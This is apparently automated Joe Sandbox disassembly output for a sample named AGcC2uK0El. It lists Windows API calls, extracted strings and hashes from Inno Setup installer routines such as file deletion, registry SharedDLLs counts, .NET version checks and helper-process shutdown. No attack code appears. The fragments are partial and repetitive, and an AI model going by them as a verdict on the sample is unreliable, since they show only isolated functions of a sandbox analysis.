                                                                                    • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                                                    • Opcode Fuzzy Hash: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
                                                                                    • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000,00496FED,?,00000000), ref: 00496917
                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000,?,00496FE3,00000000), ref: 0049692A
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000,00000000), ref: 0049693A
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0049695B
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000,?,00000000), ref: 0049696B
                                                                                      • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                    • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                                    • API String ID: 2000705611-3392794427
                                                                                    • Opcode ID: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                    • Instruction ID: 31cdb79ee62171b288e36ce2cb74f04ee829b5848567b5503989d80848a91494
                                                                                    • Opcode Fuzzy Hash: a02d3fed669f7fb7c340bf5c1bb211ceb87890bb9eb81734911f04de300cbb5a
                                                                                    • Instruction Fuzzy Hash: 1191D530A04255AFDF11EBA5C852BAF7FA4EB49304F528477F500AB2C2D67DAC05CB69
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,0045A0B4,?,?,?,?,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 00459F66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                    • API String ID: 1452528299-3112430753
                                                                                    • Opcode ID: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                    • Instruction ID: 69f6fbefbe6f055fc938da3b3950c8fb4cadcfc16d4dd4dc981ad9326b9f7ff7
                                                                                    • Opcode Fuzzy Hash: b40920f120a9bf38da6ee553801966ffb6b78c7b5657bb9011c081c98828634e
                                                                                    • Instruction Fuzzy Hash: 5D71B130B102049BCB00EF6998827AE77A5AF49716F50856BFC05DB383DB7C9E4D875A
                                                                                    APIs
                                                                                    • GetVersion.KERNEL32 ref: 0045C2FA
                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045C31A
                                                                                    • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045C327
                                                                                    • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045C334
                                                                                    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045C342
                                                                                      • Part of subcall function 0045C1E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C287,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C261
                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C3FB
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045C535,?,?,00000000), ref: 0045C404
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                    • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                    • API String ID: 59345061-4263478283
                                                                                    • Opcode ID: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                    • Instruction ID: 8ce8c74b38915e38562a90fe4681b9431f62f8b5bebe6c1e41ffef27034fd0c0
                                                                                    • Opcode Fuzzy Hash: 4113bb8dbcd17bfcbcc3a54e2f337fa89a8317241d30fe9918db60e1e55ed00a
                                                                                    • Instruction Fuzzy Hash: DF5163B1900708EFDB10DFD9C881BAEB7B8EB4D711F14806AF905B7241D678A945CFA9
                                                                                    APIs
                                                                                    • 73A14C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                    • 73A14C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                    • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                    • 73A16180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                    • 73A0A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                    • 73A14C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                    • 73A0A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                    • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                    • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                    • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                    • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$Select$Delete$A16180A480A570Stretch
                                                                                    • String ID:
                                                                                    • API String ID: 3135053572-0
                                                                                    • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                    • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                    • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                    • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                    APIs
                                                                                      • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                                    • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                                    • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                                    • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                    • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                    • API String ID: 971782779-3668018701
                                                                                    • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                    • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                                    • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                                    • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                                      • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                    • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                                    • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                                    Strings
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                                    • RegOpenKeyEx, xrefs: 00453E2C
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                                    • , xrefs: 00453E1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue$FormatMessageOpen
                                                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                    • API String ID: 2812809588-1577016196
                                                                                    • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                    • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                                    • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                                    • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                                    APIs
                                                                                      • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                                    Strings
                                                                                    • .NET Framework version %s not found, xrefs: 00458D29
                                                                                    • v2.0.50727, xrefs: 00458C7B
                                                                                    • .NET Framework not found, xrefs: 00458D3D
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                                    • v1.1.4322, xrefs: 00458CE2
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                                    • v4.0.30319, xrefs: 00458C11
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$Open
                                                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                    • API String ID: 2976201327-446240816
                                                                                    • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                    • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                                    • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                    • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                                    • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                                    Strings
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                                    • Helper isn't responding; killing it., xrefs: 004581A7
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                                    • Helper process exited., xrefs: 004581E5
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
                                                                                    • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                    • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                                    • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                    • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                                      • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                    Strings
                                                                                    • RegCreateKeyEx, xrefs: 00453ADF
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                                    • , xrefs: 00453ACD
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFormatMessageQueryValue
                                                                                    • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                    • API String ID: 2481121983-1280779767
                                                                                    • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                    • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                                    • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                    • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                                    APIs
                                                                                      • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                      • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                                    • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                                    • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                                      • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                    • 73A15CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                    • API String ID: 170458502-2312673372
                                                                                    • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                    • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                                    • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                    • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                                    • API String ID: 4190037839-37397897
                                                                                    • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                    • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                                    • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                    • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 00462124
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
